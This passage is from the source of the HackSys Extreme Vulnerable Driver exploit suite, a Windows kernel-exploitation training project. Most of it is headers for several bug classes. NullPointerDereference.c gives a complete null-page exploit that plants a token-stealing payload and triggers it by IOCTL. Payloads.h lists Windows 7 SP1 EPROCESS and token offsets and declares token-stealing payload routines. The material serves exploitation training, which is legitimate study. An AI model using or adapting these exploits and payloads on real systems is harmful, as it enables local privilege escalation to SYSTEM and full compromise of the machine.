VOID WritePayloadDll(LPCTSTR szPath);
VOID LaunchWMIProcess();

/* Thread entry point for this case; Parameter is the LPVOID supplied at
 * thread creation. */
DWORD WINAPI InsecureKernelFileAccessThread(LPVOID Parameter);
66 |
67 | #endif //__INSECURE_KERNEL_RESOURCE_ACCESS_H__
68 |
--------------------------------------------------------------------------------
/Exploit/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Integer Overflow Vulnerability implemented
48 | in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __INTEGER_OVERFLOW_H__
53 | #define __INTEGER_OVERFLOW_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
/* Constants consumed by IntegerOverflow.c (not visible here); their meaning
 * is defined by how that file builds its input buffer. */
#define BUFFER_TERMINATOR 1
#define RET_OVERWRITE_INTEGER 11

/* Thread entry point for the integer overflow case; Parameter is the LPVOID
 * supplied at thread creation. */
DWORD WINAPI IntegerOverflowThread(LPVOID Parameter);
63 |
64 | #endif //__INTEGER_OVERFLOW_H__
65 |
--------------------------------------------------------------------------------
/Exploit/NullPointerDereference.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | NullPointerDereference.c
44 |
45 | Abstract:
46 | This module implements the exploit for Null Pointer
47 | Dereference Vulnerability implemented in HackSys Extreme
48 | Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #include "NullPointerDereference.h"
53 |
/*
 * Thread routine for the Null Pointer Dereference case.
 *
 * Parameter - the LPVOID supplied at thread creation; not used here.
 * Returns   - EXIT_SUCCESS once the IOCTL has been issued. Every failure path
 *             calls exit(EXIT_FAILURE), which terminates the whole process
 *             rather than just this thread, so a caller never observes a
 *             failure return.
 *
 * NOTE(review): pointer values are narrowed through ULONG below and the
 * solution file only carries Win32 configurations, so this is x86-only code.
 * NOTE(review): mapping the zero page is refused on Windows 8 and later; that
 * mitigation is what makes this class of bug non-exploitable there, and the
 * offsets in Payloads.h are for Windows 7 SP1 x86 accordingly.
 */
DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;
    ULONG MagicValue = 0xBAADF00D;
    PVOID NullPointerPlus4 = NULL;
    PVOID NullPageBaseAddress = NULL;   /* deliberately stays NULL: address 0 is the page MapNullPage() is expected to map */
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;   /* DEVICE_NAME comes from Common.h (not visible here) */
    PVOID EopPayload = &TokenStealingPayloadWin7Generic;   /* declared in Payloads.h */

    __try {
        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            /* %X with a HANDLE is only width-correct on the 32-bit build. */
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Mapping Null Page\n");

        /* MapNullPage() is defined elsewhere. The store through
         * NullPointerPlus4 below is only valid once it has succeeded, so the
         * exit() on failure is load-bearing, not just cosmetic. */
        if (!MapNullPage()) {
            DEBUG_ERROR("\t\t[-] Failed Mapping Null Page: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }

        DEBUG_INFO("\t\t[+] Preparing Null Page Memory Layout\n");

        /* ULONG pointer arithmetic: truncates on 64-bit, fine for Win32. */
        NullPointerPlus4 = (PVOID)((ULONG)NullPageBaseAddress + 0x4);

        // Now set the function pointer
        *(PULONG)NullPointerPlus4 = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] NullPage+0x4 Value: 0x%p\n", *(PULONG)NullPointerPlus4);
        DEBUG_INFO("\t\t\t[+] NullPage+0x4 Address: 0x%p\n", NullPointerPlus4);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Null Pointer Dereference\n");

        /* The two OutputDebugString markers bracket the IOCTL so the
         * kernel-side DbgPrint output can be located in a debugger. */
        OutputDebugString("****************Kernel Mode****************\n");

        /* NOTE(review): nInBufferSize is passed as 0 although &MagicValue is
         * supplied as the input buffer; confirm against the driver's handler
         * (not visible here) that it does not depend on the reported length.
         * The BOOL result is not checked, so a failed call is silent. */
        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
                        (LPVOID)&MagicValue,
                        0,
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        /* Catches any SEH exception from the user-mode accesses above.
         * GetLastError() does not carry the exception code; GetExceptionCode()
         * would be the value worth logging here. */
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    /* NOTE(review): hFile is never closed; it lives until process exit. */
    return EXIT_SUCCESS;
}
121 |
--------------------------------------------------------------------------------
/Exploit/NullPointerDereference.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | NullPointerDereference.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Null Pointer Dereference Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __NULL_POINTER_DEREFERENCE_H__
53 | #define __NULL_POINTER_DEREFERENCE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
/* Thread entry point for the null pointer dereference case (defined in
 * NullPointerDereference.c). Parameter is the LPVOID supplied at thread
 * creation; returns a thread exit code. */
DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter);
60 |
61 | #endif //__NULL_POINTER_DEREFERENCE_H__
62 |
--------------------------------------------------------------------------------
/Exploit/Payloads.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | Payloads.h
44 |
45 | Abstract:
46 | This module implements the data structures used by EoP payload.
47 |
48 | --*/
49 |
50 | #ifndef __PAYLOADS_H__
51 | #define __PAYLOADS_H__
52 |
53 | #pragma once
54 |
55 | #include "Common.h"
56 |
/*
 * Structure offsets for Windows 7 SP1 x86 only. They are build-specific:
 * on any other kernel build these values point into unrelated fields, so a
 * payload using them must be gated on the target version.
 */
#define KTHREAD_OFFSET 0x124   // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET 0x050  // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET 0x0B4       // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET 0x0B8     // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET 0x0F8     // nt!_EPROCESS.Token
#define SYSTEM_PID 0x004       // SYSTEM Process PID

/*
 * Token-stealing payload variants implemented in Payloads.c (not visible
 * here); all are VOID(VOID) routines built on the offsets above.
 * NOTE(review): TokenStealingPayladGSWin7 is spelled as it is defined and
 * referenced elsewhere; renaming it needs the .c and its callers too.
 */
VOID TokenStealingPayloadWin7();
VOID TokenStealingPayloadWin7New();
VOID TokenStealingPayloadWin7Generic();
VOID TokenStealingPayladGSWin7();
VOID TokenStealingPayloadPoolOverflowWin7();
VOID TokenStealingPayloadDuplicateToken();
VOID TokenStealingPayloadPsReferencePrimaryToken();
72 |
73 | #endif //__PAYLOADS_H__
74 |
--------------------------------------------------------------------------------
/Exploit/PoolOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | PoolOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Pool Overflow Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __POOL_OVERFLOW_H__
53 | #define __POOL_OVERFLOW_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
/* Constants consumed by PoolOverflow.c (not visible here). */
#define POOL_BUFFER_SIZE 504
#define TYPE_INDEX_OVERWRITE 40

/*
 * Handle arrays used for the pool spray.
 * NOTE(review): these are definitions, not `extern` declarations, so every
 * translation unit that includes this header defines its own copy and the
 * build relies on the linker merging tentative definitions. Confirm that only
 * PoolOverflow.c includes this header, or move the definitions into the .c
 * and declare them `extern` here.
 */
HANDLE EventObjectArrayA[10000];
HANDLE EventObjectArrayB[5000];

/* Spray / hole-creation / cleanup helpers, in the order they are presumably
 * called; each is VOID(VOID). */
VOID SprayNonPagedPoolWithEventObjects();
VOID CreateHolesInNonPagedPoolByCoalescingEventObjects();
VOID FreeEventObjects();

/* Thread entry point for the pool overflow case; Parameter is the LPVOID
 * supplied at thread creation. */
DWORD WINAPI PoolOverflowThread(LPVOID Parameter);
69 |
70 | #endif //__POOL_OVERFLOW_H__
71 |
--------------------------------------------------------------------------------
/Exploit/StackOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | StackOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Stack Overflow Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __STACK_OVERFLOW_H__
53 | #define __STACK_OVERFLOW_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
/* Constant consumed by StackOverflow.c (not visible here); its meaning is
 * defined by how that file lays out its input buffer. */
#define RET_OVERWRITE 9

/* Thread entry point for the stack overflow case; Parameter is the LPVOID
 * supplied at thread creation. */
DWORD WINAPI StackOverflowThread(LPVOID Parameter);
62 |
63 | #endif //__STACK_OVERFLOW_H__
64 |
--------------------------------------------------------------------------------
/Exploit/StackOverflowGS.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | StackOverflowGS.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Stack Overflow Vulnerability protected by
48 | GS cookies implemented in HackSys Extreme Vulnerable
49 | Driver.
50 |
51 | --*/
52 |
53 | #ifndef __STACK_OVERFLOW_GS_H__
54 | #define __STACK_OVERFLOW_GS_H__
55 |
56 | #pragma once
57 |
58 | #include "Common.h"
59 |
/* Name of the shared-memory section used by StackOverflowGS.c (not visible
 * here); the string is an interface with whatever opens it, keep it as-is. */
#define SHARED_MEMORY_NAME "HackSysExtremeVulnerableDriverSharedMemory"

/* Flag value consumed by StackOverflowGS.c. */
#define RAISE_EXCEPTION_IN_KERNEL_MODE 0x4

/* Thread entry point for the /GS-protected stack overflow case; Parameter is
 * the LPVOID supplied at thread creation. */
DWORD WINAPI StackOverflowGSThread(LPVOID Parameter);
64 |
65 | #endif //__STACK_OVERFLOW_GS_H__
66 |
--------------------------------------------------------------------------------
/Exploit/TypeConfusion.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | TypeConfusion.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Type Confusion Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
#ifndef __TYPE_CONFUSION_H__
#define __TYPE_CONFUSION_H__

#pragma once

#include "Common.h"

/*
 * Worker routine that drives the type confusion exploit.
 * Signature is LPTHREAD_START_ROUTINE-compatible (DWORD WINAPI f(LPVOID)).
 */
DWORD WINAPI TypeConfusionThread(LPVOID Parameter);

/*
 * User-mode image of the object handed to the driver: two pointer-sized
 * fields and no padding, so sizeof() is 2 * sizeof(ULONG_PTR) on both
 * x86 and x64. The layout is presumably mirrored from the driver's own
 * type-confusion structure; keep field order and widths in sync with it.
 * What the driver does with each field is defined on the driver side.
 */
typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR objectID;
    ULONG_PTR objectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

#endif /* __TYPE_CONFUSION_H__ */
67 |
--------------------------------------------------------------------------------
/Exploit/UninitializedHeapVariable.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
